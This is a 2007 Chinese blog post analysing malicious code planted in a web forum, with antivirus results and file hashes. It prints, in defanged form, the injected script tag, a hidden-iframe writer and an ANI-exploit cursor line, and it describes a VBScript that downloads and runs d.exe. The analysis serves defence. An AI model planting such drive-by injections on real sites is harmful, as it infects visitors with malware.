上回挂JPG图片的论坛改挂 d.exe 了

本文记录了2007年某论坛被植入的恶意代码分析过程,其中包括Trojan.DL.VBS.Small.ei和Hack.SuspiciousAni等病毒。通过分析,发现了恶意代码如何利用Microsoft.XMLHTTP和scrīpting.FileSystemObject下载并运行恶意文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

endurer 原创
2007-05-27第1

刚才去

某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
http://endurer.bokee.com/6279320.html
http://blog.sina.com.cn/u/49926d91010008qj
http://blog.youkuaiyun.com/Purpleendurer/archive/2007/05/17/1613097.aspx
http://purple-endurer.blogspot.com/2007/05/jpg-or-trojanwin32vbazc.html

中的论坛转了转,发现挂的马变了,瑞星报告发现:Trojan.DL.VBS.Small.ei和Hack.SuspiciousAni。

网页首部植入的代码变为:
/---
<script language=javascript src=hxxp://www**.8**8*vcd.com/htm*/china***/menu**.js></script>
---/

menu**.js 包含代码:
/---
document.writeln("<iframe src=/"hxxp:////www**.8**8*vcd.com//htm*//china***//index*.htm/" width=/"100/" height=/"0/" frameborder=/"0/"><//iframe>");
---/

index*.htm 的title居然是:“人民公社”,包含两段恶意代码。
其一是VBScript脚本,没有加密,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 d.exe,保存为 c:/0.exe,然后通过 Shell.Application 对象 Q 的 ShellExecute 方法 来运行。

文件说明符 : D:/test/d.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-27 21:38:15
修改时间 : 2007-5-27 21:38:24
访问时间 : 2007-5-27 0:0:0
大小 : 18432 字节 18.0 KB
MD5 : b7e3a902048a9a5e12204083a935f64e

瑞星 19.24.61 没反应

Scanned file: d.exe


Statistics:

Known viruses:330518Updated:27-05-2007
File size (Kb):18Virus bodies:0
Files:1Warnings:0
Archives:0Suspicious:0


其二是
/---
<iframe src=IE0day.htm width=100 height=0></iframe>
---/

IE0day.htm 包含代码:
/---
<DIV style="CURSOR: url('0day.jpg')">
---/

0day.jpg 利用 ANI 漏洞下载 d.exe

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值